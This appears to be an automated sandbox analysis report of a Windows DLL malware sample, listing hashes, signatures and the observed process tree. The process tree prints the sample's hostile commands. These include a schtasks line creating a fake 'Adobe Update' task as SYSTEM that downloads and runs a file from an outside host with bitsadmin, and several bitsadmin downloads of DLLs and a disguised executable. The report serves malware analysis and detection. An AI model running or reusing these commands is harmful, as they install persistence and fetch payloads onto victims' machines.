Analysis
-
max time kernel
243s -
max time network
335s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
23-11-2022 13:04
Behavioral task
behavioral1
Sample
ce09c25de53963a85dbc3490374a657333ddc5ac697daab0fd2ebfc0d9ad3b82.dll
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
ce09c25de53963a85dbc3490374a657333ddc5ac697daab0fd2ebfc0d9ad3b82.dll
Resource
win10v2004-20220901-en
General
-
Target
ce09c25de53963a85dbc3490374a657333ddc5ac697daab0fd2ebfc0d9ad3b82.dll
-
Size
176KB
-
MD5
942bd66e50cc3913d893427cce69bd89
-
SHA1
c4f78e708b2abacb172423c648e693b6ac63ff90
-
SHA256
ce09c25de53963a85dbc3490374a657333ddc5ac697daab0fd2ebfc0d9ad3b82
-
SHA512
1888da78098e42e6736170e39b0b8efa73c30349ac722f8bcf7fcbd407d7a0d3cec4a4b982911a0658b49858bac28398b25318bca8b02370c098029096de97f5
-
SSDEEP
3072:/OJQOAhrqFlNZg+gvWUG2EPTCaRpLmRLukCTh+IWlT8FYxwtD+1C8Cl+SE7x:/OJy12Zg5REPT/Pi1CT4IWlZCYCl+hx
Malware Config
Signatures
-
Processes:
resource yara_rule behavioral1/memory/1940-56-0x00000000002F0000-0x0000000000365000-memory.dmp upx behavioral1/memory/1940-72-0x00000000002F0000-0x0000000000365000-memory.dmp upx -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 552 1940 WerFault.exe rundll32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 4 IoCs
Processes:
bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exepid process 1056 bitsadmin.exe 608 bitsadmin.exe 1716 bitsadmin.exe 1372 bitsadmin.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
rundll32.exerundll32.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1320 wrote to memory of 1940 1320 rundll32.exe rundll32.exe PID 1320 wrote to memory of 1940 1320 rundll32.exe rundll32.exe PID 1320 wrote to memory of 1940 1320 rundll32.exe rundll32.exe PID 1320 wrote to memory of 1940 1320 rundll32.exe rundll32.exe PID 1320 wrote to memory of 1940 1320 rundll32.exe rundll32.exe PID 1320 wrote to memory of 1940 1320 rundll32.exe rundll32.exe PID 1320 wrote to memory of 1940 1320 rundll32.exe rundll32.exe PID 1940 wrote to memory of 1840 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 1840 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 1840 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 1840 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 532 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 532 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 532 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 532 1940 rundll32.exe cmd.exe PID 1840 wrote to memory of 1772 1840 cmd.exe schtasks.exe PID 1840 wrote to memory of 1772 1840 cmd.exe schtasks.exe PID 1840 wrote to memory of 1772 1840 cmd.exe schtasks.exe PID 1840 wrote to memory of 1772 1840 cmd.exe schtasks.exe PID 1940 wrote to memory of 1080 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 1080 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 1080 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 1080 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 1764 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 1764 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 1764 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 1764 1940 rundll32.exe cmd.exe PID 532 wrote to memory of 1056 532 cmd.exe bitsadmin.exe PID 532 wrote to memory of 1056 532 cmd.exe bitsadmin.exe PID 532 wrote to memory of 1056 532 cmd.exe bitsadmin.exe PID 532 wrote to memory of 1056 532 cmd.exe bitsadmin.exe PID 1080 wrote to memory of 608 1080 cmd.exe bitsadmin.exe PID 1080 wrote to memory of 608 1080 cmd.exe bitsadmin.exe PID 1080 wrote to memory of 608 1080 cmd.exe bitsadmin.exe PID 1080 wrote to memory of 608 1080 cmd.exe bitsadmin.exe PID 1940 wrote to memory of 304 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 304 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 304 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 304 1940 rundll32.exe cmd.exe PID 1940 wrote to memory of 552 1940 rundll32.exe WerFault.exe PID 1940 wrote to memory of 552 1940 rundll32.exe WerFault.exe PID 1940 wrote to memory of 552 1940 rundll32.exe WerFault.exe PID 1940 wrote to memory of 552 1940 rundll32.exe WerFault.exe PID 1764 wrote to memory of 1716 1764 cmd.exe bitsadmin.exe PID 1764 wrote to memory of 1716 1764 cmd.exe bitsadmin.exe PID 1764 wrote to memory of 1716 1764 cmd.exe bitsadmin.exe PID 1764 wrote to memory of 1716 1764 cmd.exe bitsadmin.exe PID 304 wrote to memory of 1372 304 cmd.exe bitsadmin.exe PID 304 wrote to memory of 1372 304 cmd.exe bitsadmin.exe PID 304 wrote to memory of 1372 304 cmd.exe bitsadmin.exe PID 304 wrote to memory of 1372 304 cmd.exe bitsadmin.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\ce09c25de53963a85dbc3490374a657333ddc5ac697daab0fd2ebfc0d9ad3b82.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\ce09c25de53963a85dbc3490374a657333ddc5ac697daab0fd2ebfc0d9ad3b82.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /CREATE /SC onstart /DELAY 0015:00 /TN "Adobe Update" /TR "cmd /c bitsadmin /transfer My /Download /PRIORITY HIGH http://migre.es/b001.jpg %TEMP%\b001.cpl &%TEMP%\b001.cpl" /ru SYSTEM /f3⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC onstart /DELAY 0015:00 /TN "Adobe Update" /TR "cmd /c bitsadmin /transfer My /Download /PRIORITY HIGH http://migre.es/b001.jpg C:\Users\Admin\AppData\Local\Temp\b001.cpl &C:\Users\Admin\AppData\Local\Temp\b001.cpl" /ru SYSTEM /f4⤵
- Creates scheduled task(s)
PID:1772 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/Anonymizer.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Anonymizer.dll"3⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/Anonymizer.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Anonymizer.dll"4⤵
- Download via BitsAdmin
PID:1056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/manifest.json.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\manifest.json"3⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/manifest.json.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\manifest.json"4⤵
- Download via BitsAdmin
PID:608 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/Migre.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Migre.dll"3⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/Migre.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\Migre.dll"4⤵
- Download via BitsAdmin
PID:1716 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/icon.png" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\icon.png"3⤵
- Suspicious use of WriteProcessMemory
PID:304 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer myDownload /Download /Priority HIGH "http://migre.es/b001/icon.png" "C:\Users\Admin\AppData\Roaming\Microsoft\Google\icon.png"4⤵
- Download via BitsAdmin
PID:1372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 3043⤵
- Program crash
PID:552